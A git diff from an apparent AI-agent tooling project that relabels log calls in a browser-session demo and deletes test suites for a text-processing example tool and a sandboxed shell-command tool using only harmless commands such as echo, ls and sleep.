# Original 2026-02 transcript called the now-deleted browser_start MCP
# tool here; cold-start is now folded into browser_open via lazy-start.
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
# ── Turn 2 (seq 3-4): browser_open ───────────────────────────────────
t0 = time.time()
@@ -235,10 +237,10 @@ async def demonstrate_correct_approach(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1: browser_start ────────────────────────────────────────────
# ── Turn 1: session start ────────────────────────────────────────────
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}", time.time() - t0)
# ── Turn 2: browser_open + browser_wait for SPA ──────────────────────
t0 = time.time()
-126
View File
@@ -1,126 +0,0 @@
"""Tests for example_tool - A simple text processing tool."""
import pytest
from fastmcp import FastMCP
from aden_tools.tools.example_tool.example_tool import register_tools
@pytest.fixture
def example_tool_fn(mcp: FastMCP):
"""Register and return the example_tool function."""
register_tools(mcp)
return mcp._tool_manager._tools["example_tool"].fn
class TestExampleTool:
"""Tests for example_tool function."""
def test_valid_message(self, example_tool_fn):
"""Basic message returns unchanged."""
result = example_tool_fn(message="Hello, World!")
assert result == "Hello, World!"
def test_uppercase_true(self, example_tool_fn):
"""uppercase=True converts message to uppercase."""
result = example_tool_fn(message="hello", uppercase=True)
assert result == "HELLO"
def test_uppercase_false(self, example_tool_fn):
"""uppercase=False (default) preserves case."""
result = example_tool_fn(message="Hello", uppercase=False)
assert result == "Hello"
def test_repeat_multiple(self, example_tool_fn):
"""repeat=3 joins message with spaces."""
result = example_tool_fn(message="Hi", repeat=3)
assert result == "Hi Hi Hi"
def test_repeat_default(self, example_tool_fn):
"""repeat=1 (default) returns single message."""
result = example_tool_fn(message="Hello", repeat=1)
assert result == "Hello"
def test_uppercase_and_repeat_combined(self, example_tool_fn):
"""uppercase and repeat work together."""
result = example_tool_fn(message="hi", uppercase=True, repeat=2)
assert result == "HI HI"
def test_empty_message_error(self, example_tool_fn):
"""Empty string returns error string."""
result = example_tool_fn(message="")
assert "Error" in result
assert "1-1000" in result
def test_message_too_long_error(self, example_tool_fn):
"""Message over 1000 chars returns error string."""
long_message = "x" * 1001
result = example_tool_fn(message=long_message)
assert "Error" in result
assert "1-1000" in result
def test_message_at_max_length(self, example_tool_fn):
"""Message exactly 1000 chars is valid."""
max_message = "x" * 1000
result = example_tool_fn(message=max_message)
assert result == max_message
def test_repeat_zero_error(self, example_tool_fn):
"""repeat=0 returns error string."""
result = example_tool_fn(message="Hi", repeat=0)
assert "Error" in result
assert "1-10" in result
def test_repeat_eleven_error(self, example_tool_fn):
"""repeat=11 returns error string."""
result = example_tool_fn(message="Hi", repeat=11)
assert "Error" in result
assert "1-10" in result
def test_repeat_at_max(self, example_tool_fn):
"""repeat=10 (maximum) is valid."""
result = example_tool_fn(message="Hi", repeat=10)
assert result == " ".join(["Hi"] * 10)
def test_repeat_negative_error(self, example_tool_fn):
"""Negative repeat returns error string."""
result = example_tool_fn(message="Hi", repeat=-1)
assert "Error" in result
assert "1-10" in result
def test_whitespace_only_message(self, example_tool_fn):
"""Whitespace-only message is valid (non-empty)."""
result = example_tool_fn(message=" ")
assert result == " "
def test_special_characters_in_message(self, example_tool_fn):
"""Special characters are preserved."""
result = example_tool_fn(message="Hello! @#$%^&*()")
assert result == "Hello! @#$%^&*()"
def test_unicode_message(self, example_tool_fn):
"""Unicode characters are handled correctly."""
result = example_tool_fn(message="Hello 世界 🌍")
assert result == "Hello 世界 🌍"
def test_unicode_uppercase(self, example_tool_fn):
"""Unicode uppercase conversion works."""
result = example_tool_fn(message="café", uppercase=True)
assert result == "CAFÉ"
@@ -1,226 +0,0 @@
"""Tests for the remaining file_system_toolkits — execute_command_tool only.
The file tools (read_file, write_file, edit_file, hashline_edit, search_files,
apply_patch) all live in aden_tools.file_ops and are tested in test_file_ops.py.
"""
import asyncio
import os
import sys
from unittest.mock import patch
import pytest
from fastmcp import FastMCP
@pytest.fixture
def mcp():
"""Create a FastMCP instance."""
return FastMCP("test-server")
@pytest.fixture
def mock_workspace():
"""Mock agent ID for the shell tool."""
return {"agent_id": "test-agent"}
@pytest.fixture
def mock_secure_path(tmp_path):
"""Patch the shell tool's sandbox resolver onto tmp_path."""
def _get_sandboxed_path(path, agent_id):
return os.path.join(tmp_path, path)
with (
patch(
"aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.get_sandboxed_path",
side_effect=_get_sandboxed_path,
),
patch(
"aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.AGENT_SANDBOXES_DIR",
str(tmp_path),
),
):
yield
class TestExecuteCommandTool:
"""Tests for execute_command_tool."""
@pytest.fixture
def execute_command_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["execute_command_tool"].fn
async def test_execute_simple_command(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a simple command returns output."""
result = await execute_command_fn(command="echo 'Hello World'", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "Hello World" in result["stdout"]
async def test_execute_failing_command(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a failing command returns non-zero exit code."""
result = await execute_command_fn(command="exit 1", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 1
async def test_execute_command_with_stderr(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a command that writes to stderr captures it."""
result = await execute_command_fn(command="echo 'error message' >&2", **mock_workspace)
assert result["success"] is True
assert "error message" in result.get("stderr", "")
async def test_execute_command_list_files(self, execute_command_fn, mock_workspace, mock_secure_path, tmp_path):
"""Executing ls command lists files."""
(tmp_path / "testfile.txt").write_text("content", encoding="utf-8")
result = await execute_command_fn(command=f"ls {tmp_path}", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "testfile.txt" in result["stdout"]
async def test_execute_command_with_pipe(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a command with pipe works correctly."""
result = await execute_command_fn(command="echo 'hello world' | tr 'a-z' 'A-Z'", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "HELLO WORLD" in result["stdout"]
@pytest.fixture
def bash_output_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["bash_output"].fn
@pytest.fixture
def bash_kill_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["bash_kill"].fn
async def test_per_call_timeout_overrides_default(self, execute_command_fn, mock_workspace, mock_secure_path):
"""A per-call timeout under the default kills the command early."""
import time
start = time.monotonic()
result = await execute_command_fn(
command="sleep 10",
timeout_seconds=1,
**mock_workspace,
)
elapsed = time.monotonic() - start
assert result.get("timed_out") is True
assert "1 seconds" in result.get("error", "")
assert elapsed < 5, f"timeout did not kill the command promptly ({elapsed:.2f}s)"
async def test_timeout_is_clamped_upwards(self, execute_command_fn, mock_workspace, mock_secure_path):
"""A timeout above the 600s ceiling is silently clamped."""
result = await execute_command_fn(
command="echo fast",
timeout_seconds=99999,
**mock_workspace,
)
assert result["success"] is True
assert "fast" in result["stdout"]
async def test_event_loop_unblocked_while_command_runs(self, execute_command_fn, mock_workspace, mock_secure_path):
"""The event loop keeps servicing other tasks while a bash command runs."""
ticks = 0
async def ticker():
nonlocal ticks
for _ in range(20):
await asyncio.sleep(0.05)
ticks += 1
ticker_task = asyncio.create_task(ticker())
result = await execute_command_fn(command="sleep 0.5", **mock_workspace)
await ticker_task
assert result["success"] is True
assert ticks >= 5, f"event loop looked blocked during subprocess (only {ticks} ticks in 1s)"
async def test_background_job_start_poll_and_complete(
self,
execute_command_fn,
bash_output_fn,
mock_workspace,
mock_secure_path,
):
"""A run_in_background job can be started, polled, and reports its exit status."""
py_script = (
"import time,sys;"
"print('one');sys.stdout.flush();time.sleep(0.1);"
"print('two');sys.stdout.flush();time.sleep(0.1);"
"print('three')"
)
start_result = await execute_command_fn(
command=f'"{sys.executable}" -c "{py_script}"',
run_in_background=True,
**mock_workspace,
)
assert start_result["background"] is True
job_id = start_result["id"]
deadline = asyncio.get_event_loop().time() + 5.0
seen_text = ""
while asyncio.get_event_loop().time() < deadline:
poll = await bash_output_fn(id=job_id, **mock_workspace)
seen_text += poll["stdout"]
if poll["status"].startswith("exited"):
break
await asyncio.sleep(0.05)
assert "one" in seen_text
assert "two" in seen_text
assert "three" in seen_text
assert poll["status"] == "exited(0)"
async def test_background_job_kill(
self,
execute_command_fn,
bash_output_fn,
bash_kill_fn,
mock_workspace,
mock_secure_path,
):
"""bash_kill terminates a long-running background job."""
start_result = await execute_command_fn(
command="sleep 30",
run_in_background=True,
**mock_workspace,
)
job_id = start_result["id"]
kill_result = await bash_kill_fn(id=job_id, **mock_workspace)
assert kill_result["id"] == job_id
assert "terminated" in kill_result["status"] or "killed" in kill_result["status"]
poll = await bash_output_fn(id=job_id, **mock_workspace)
assert "no background job" in poll.get("error", "")
async def test_bash_output_isolated_across_agents(self, execute_command_fn, bash_output_fn, mock_secure_path):
"""Agent A's job id is not reachable from agent B."""
start = await execute_command_fn(
command="sleep 5",
run_in_background=True,
agent_id="agent-A",
)
poll_b = await bash_output_fn(id=start["id"], agent_id="agent-B")
assert "no background job" in poll_b.get("error", "")
from aden_tools.tools.file_system_toolkits.execute_command_tool import background_jobs
await background_jobs.clear_agent("agent-A")